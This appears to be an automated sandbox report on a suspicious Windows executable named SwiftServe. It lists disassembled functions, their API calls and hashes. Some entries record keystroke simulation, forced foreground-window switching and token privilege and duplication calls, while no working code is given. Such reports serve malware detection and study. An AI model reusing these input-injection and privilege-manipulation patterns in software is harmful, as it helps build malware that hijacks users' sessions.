Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 2fd9c2d2b404ace4ae9960b9774eb56cbd0bd77151ac2c085c16529a142c1dca
Instruction ID: f724a1ce9529f5ec7838060c46fd1ac46de5b5327fbe6ab5eea0f49e39d0c244
Opcode Fuzzy Hash: 2fd9c2d2b404ace4ae9960b9774eb56cbd0bd77151ac2c085c16529a142c1dca
Instruction Fuzzy Hash: 6F112372650305ABDB14FB70CC0AFAE7BE89F40701F10942DF545B61C2FA70AA00EB94

Function 00E5E3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00E5E3CE

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: fbb2384eccfc348d6c39927a6e4cd8375cccab562521f83e58929258298a0f69
Instruction ID: ea64142bcd4b75502ccf6a651e3ccbca44bd5eb7c0534624f6d2ca2859462e4b
Opcode Fuzzy Hash: fbb2384eccfc348d6c39927a6e4cd8375cccab562521f83e58929258298a0f69
Instruction Fuzzy Hash: 752110B4908351DFCB28DF14D444B1ABBE1BF84308F059A68F88A67362C731F859CB92

Function 00E31A36 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E31A77

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 29c7e1e7602ca52123ae462c97771b54d00391c46f6958ad3679f5600b6ae239
Instruction ID: 9d5937eb235734f749649e826ef5892711e3c1013fbb83806e707d49b603ee49
Opcode Fuzzy Hash: 29c7e1e7602ca52123ae462c97771b54d00391c46f6958ad3679f5600b6ae239
Instruction Fuzzy Hash: 8601D1722017056ED7245B38E806B67BBE8EB447A0F10953EFA1ADA1D1EA31E440CBA0

Function 00E7FEF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E7FF33

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: fc03992cce3eb07a5da68454dd0426a21a55b9536bfa1a309e26490d58225427
Instruction ID: bc81987b986f892a89836be8954cf940d5dd090fb61ae4174900a1f27340e6ff
Opcode Fuzzy Hash: fc03992cce3eb07a5da68454dd0426a21a55b9536bfa1a309e26490d58225427
Instruction Fuzzy Hash: B60186723012156BCB28DF2DD89196BB7E9EF86354714857EF90ECB245EA31E901C790

Function 00E9495B Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00E94998

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: c8601e2382dd75b679636e754f523969ac3e3a1a8b8ea9d6659b3d0f8ec15b67
Instruction ID: 6925471afcce3130108ffec240f8cf80d828d835707f98213d3aba64c5e95544
Opcode Fuzzy Hash: c8601e2382dd75b679636e754f523969ac3e3a1a8b8ea9d6659b3d0f8ec15b67
Instruction Fuzzy Hash: 18F03175608105AF8B14FBA5D84AC9F7BFCEF45720B005195F908AB2A1DE70BD85C750

Function 00E34A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

_fseek.LIBCMT ref: 00E34AA4

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _fseek
String ID:
API String ID: 2937370855-0
Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction ID: 1cff6b4f0be9709cc7db954b12289e60ff9e389b679349e50f61e5d03428df6f
Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction Fuzzy Hash: D3F08CB6400208FFDF108F44DC04CEB7FB9EB85324F004198F9046A111D232EA21DBA0

Function 00E34A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00E327AF,?,00000001), ref: 00E34A63

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: aeb863e63866491258451bc9bc89d9b1adf0860a84241b3af6d7dcdd79e10f09
Instruction ID: 40bc4cb5c35e6a4e06cae10b5bbbea84aea135db221363237b870226d147a7ce
Opcode Fuzzy Hash: aeb863e63866491258451bc9bc89d9b1adf0860a84241b3af6d7dcdd79e10f09
Instruction Fuzzy Hash: E7F015B1145701CFCB349F64E498866BFF0AF14329720AA6EE1DAA3751D731A984DF44

Function 00E34AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00E34AD0

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction ID: 555f3214640ab08cc0c8807ce5ab39d437a84a5a81edabd39c1d171c6d34bd30
Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction Fuzzy Hash: 39F05E7240020DFFDF04CF80C941EAA7B79FB04314F108189FD185A112D332DA21EB90

Function 00E60A79 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00E60A84

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 3ecd7cacd218105fab59071f288ed5cf42ddd732d74395c628d45acf5b2eb81d
Instruction ID: a72aa27b0cf5e8560b1651fe08bc7054a88a406f5c59e4c54e52ee26b6cdb320
Opcode Fuzzy Hash: 3ecd7cacd218105fab59071f288ed5cf42ddd732d74395c628d45acf5b2eb81d
Instruction Fuzzy Hash: D5E02BB17483615EE7309BA4B404763FBD4AB00354F10655ED4A6B1240E375589497B1

Function 00E409C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E409E4

Part of subcall function 00E31821: _memmove.LIBCMT ref: 00E3185B

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: ff7f81ef15722a3c938aef0716a1c743de42e6cd618c7752c735676ead08ea1a
Instruction ID: 1b6f735df75cc17907a5f9e81aa7bc14b3b87aabec49e43eb1d170f6316c985d
Opcode Fuzzy Hash: ff7f81ef15722a3c938aef0716a1c743de42e6cd618c7752c735676ead08ea1a
Instruction Fuzzy Hash: CFE086329002285BC72196989C09FEE77DDDB89691F0402F6FC08E7204D960AC858691

Function 00E84D18 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00E84D31

Part of subcall function 00E31821: _memmove.LIBCMT ref: 00E3185B

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: FolderPath_memmove
String ID:
API String ID: 3334745507-0
Opcode ID: cc9bddfab2e51c8dd403bb40db0bf0a77b9b0c8d2d45f14779018f4a87737247
Instruction ID: 349b28e428da28d85eea54f842ee89d60f0c91d14c625c3a8bf1140b32ae18c9
Opcode Fuzzy Hash: cc9bddfab2e51c8dd403bb40db0bf0a77b9b0c8d2d45f14779018f4a87737247
Instruction Fuzzy Hash: C1D05EA190032C2FDB64E6A59C4DDB77BACD744220F0007E57C6CD3101E924AD4586E1

Function 00E877C2 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_000677A8,?,00000000,?), ref: 00E877DD

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 0bdb98ddb01731f4f8f9f5a9519452e90e4f7964581400d296961587115e95cc
Instruction ID: 4cb7939a1225f379004aa6fa2621e3be37ed4845346a88bdd1316db3e010d312
Opcode Fuzzy Hash: 0bdb98ddb01731f4f8f9f5a9519452e90e4f7964581400d296961587115e95cc
Instruction Fuzzy Hash: 57D012714693147F662C9B65DC46C67769CEA05622740136FB84991500E6A1FC0086A0

Function 00E4547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00E45486

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: ec0784359249b9350d5642ceefcbc9320b2932ef501f4d6d97524e10e1908a3a
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 61B0927644020CB7CE112A92FC03A593B699B40668F408020FB1C2C162A673A6A09689

Function 00E43588 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

_doexit.LIBCMT ref: 00E43592

Part of subcall function 00E43459: __lock.LIBCMT ref: 00E43467
Part of subcall function 00E43459: DecodePointer.KERNEL32(00EDCB70,0000001C,00E433B2,00E41003,00000001,00000000,?,00E43300,000000FF,?,00E49E5E,00000011,00E41003,?,00E49CAC,0000000D), ref: 00E434A6
Part of subcall function 00E43459: DecodePointer.KERNEL32(?,00E43300,000000FF,?,00E49E5E,00000011,00E41003,?,00E49CAC,0000000D), ref: 00E434B7
Part of subcall function 00E43459: EncodePointer.KERNEL32(00000000,?,00E43300,000000FF,?,00E49E5E,00000011,00E41003,?,00E49CAC,0000000D), ref: 00E434D0
Part of subcall function 00E43459: DecodePointer.KERNEL32(-00000004,?,00E43300,000000FF,?,00E49E5E,00000011,00E41003,?,00E49CAC,0000000D), ref: 00E434E0
Part of subcall function 00E43459: EncodePointer.KERNEL32(00000000,?,00E43300,000000FF,?,00E49E5E,00000011,00E41003,?,00E49CAC,0000000D), ref: 00E434E6
Part of subcall function 00E43459: DecodePointer.KERNEL32(?,00E43300,000000FF,?,00E49E5E,00000011,00E41003,?,00E49CAC,0000000D), ref: 00E434FC
Part of subcall function 00E43459: DecodePointer.KERNEL32(?,00E43300,000000FF,?,00E49E5E,00000011,00E41003,?,00E49CAC,0000000D), ref: 00E43507

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Pointer$Decode$Encode$__lock_doexit
String ID:
API String ID: 2158581194-0
Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction ID: 1ac379fe313b687d832283207d68127d0c9059b5c4b5e15306d17248f9a79030
Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction Fuzzy Hash: A0B0123198030C33DA112591FC03F553B4C4740B50F100020FB0C2C1E1E5D3766040C9

Non-executed Functions

Function 00EAD164 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00E229E2: GetWindowLongW.USER32(?,000000EB), ref: 00E229F3

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00EAD208
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EAD249
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00EAD28E
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EAD2B8
SendMessageW.USER32 ref: 00EAD2E1
_wcsncpy.LIBCMT ref: 00EAD359
GetKeyState.USER32(00000011), ref: 00EAD37A
GetKeyState.USER32(00000009), ref: 00EAD387
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EAD39D
GetKeyState.USER32(00000010), ref: 00EAD3A7
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EAD3D0
SendMessageW.USER32 ref: 00EAD3F7
SendMessageW.USER32(?,00001030,?,00EAB9BA), ref: 00EAD4FD
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00EAD513
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00EAD526
SetCapture.USER32(?), ref: 00EAD52F
ClientToScreen.USER32(?,?), ref: 00EAD594
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00EAD5A1
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EAD5BB
ReleaseCapture.USER32 ref: 00EAD5C6
GetCursorPos.USER32(?), ref: 00EAD600
ScreenToClient.USER32(?,?), ref: 00EAD60D
SendMessageW.USER32(?,00001012,00000000,?), ref: 00EAD669
SendMessageW.USER32 ref: 00EAD697
SendMessageW.USER32(?,00001111,00000000,?), ref: 00EAD6D4
SendMessageW.USER32 ref: 00EAD703
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00EAD724
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00EAD733
GetCursorPos.USER32(?), ref: 00EAD753
ScreenToClient.USER32(?,?), ref: 00EAD760
GetParent.USER32(?), ref: 00EAD780
SendMessageW.USER32(?,00001012,00000000,?), ref: 00EAD7E9
SendMessageW.USER32 ref: 00EAD81A
ClientToScreen.USER32(?,?), ref: 00EAD878
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00EAD8A8
SendMessageW.USER32(?,00001111,00000000,?), ref: 00EAD8D2
SendMessageW.USER32 ref: 00EAD8F5
ClientToScreen.USER32(?,?), ref: 00EAD947
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00EAD97B

Part of subcall function 00E229AB: GetWindowLongW.USER32(?,000000EB), ref: 00E229BC

GetWindowLongW.USER32(?,000000F0), ref: 00EADA17

Strings

F, xrefs: 00EAD8FB
@GUI_DRAGID, xrefs: 00EAD562

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: e61772d2d4ee51c75c6b4aeece13c053d7c4ac8ec1ecb3b7349513f960d59518
Instruction ID: 3bc742a29252c73c5ec3b6b490275a04bb4cabe8f7b6c69b61958de573300c09
Opcode Fuzzy Hash: e61772d2d4ee51c75c6b4aeece13c053d7c4ac8ec1ecb3b7349513f960d59518
Instruction Fuzzy Hash: 5B429030209341AFD725DF24CC44BAA7BE5FF8E314F14161AF696AB6A0C771E858CB91

Function 00E35EDA Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00E35EE2
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E710D7
IsIconic.USER32(?), ref: 00E710E0
ShowWindow.USER32(?,00000009), ref: 00E710ED
SetForegroundWindow.USER32(?), ref: 00E710F7
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E7110D
GetCurrentThreadId.KERNEL32 ref: 00E71114
GetWindowThreadProcessId.USER32(?,00000000), ref: 00E71120
AttachThreadInput.USER32(?,00000000,00000001), ref: 00E71131
AttachThreadInput.USER32(?,00000000,00000001), ref: 00E71139
AttachThreadInput.USER32(00000000,?,00000001), ref: 00E71141
SetForegroundWindow.USER32(?), ref: 00E71144
MapVirtualKeyW.USER32(00000012,00000000), ref: 00E71159
keybd_event.USER32(00000012,00000000), ref: 00E71164
MapVirtualKeyW.USER32(00000012,00000000), ref: 00E7116E
keybd_event.USER32(00000012,00000000), ref: 00E71173
MapVirtualKeyW.USER32(00000012,00000000), ref: 00E7117C
keybd_event.USER32(00000012,00000000), ref: 00E71181
MapVirtualKeyW.USER32(00000012,00000000), ref: 00E7118B
keybd_event.USER32(00000012,00000000), ref: 00E71190
SetForegroundWindow.USER32(?), ref: 00E71193
AttachThreadInput.USER32(?,?,00000000), ref: 00E711BA

Strings

Shell_TrayWnd, xrefs: 00E710D2

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: dababbda48ee590e44223c38dbadc984dcb9a02eb2c918b8181eb0c36f762d3f
Instruction ID: f5b5444763bc249db558e092fa0df116393d07e196764d1af07c6ff15d82a868
Opcode Fuzzy Hash: dababbda48ee590e44223c38dbadc984dcb9a02eb2c918b8181eb0c36f762d3f
Instruction Fuzzy Hash: 2B31B871A413187FEB306B669C49FBF3F6CEB44B50F104156FA04BA1D0CA706D51AEA0

Function 00E78F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00E79399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E793E3
Part of subcall function 00E79399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E79410
Part of subcall function 00E79399: GetLastError.KERNEL32 ref: 00E7941D

_memset.LIBCMT ref: 00E78F71
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E78FC3
CloseHandle.KERNEL32(?), ref: 00E78FD4
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E78FEB
GetProcessWindowStation.USER32 ref: 00E79004
SetProcessWindowStation.USER32(00000000), ref: 00E7900E
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E79028

Part of subcall function 00E78DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E78F27), ref: 00E78DFE
Part of subcall function 00E78DE9: CloseHandle.KERNEL32(?,?,00E78F27), ref: 00E78E10

Strings

, xrefs: 00E78F80
default, xrefs: 00E79023
winsta0, xrefs: 00E78FE6

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
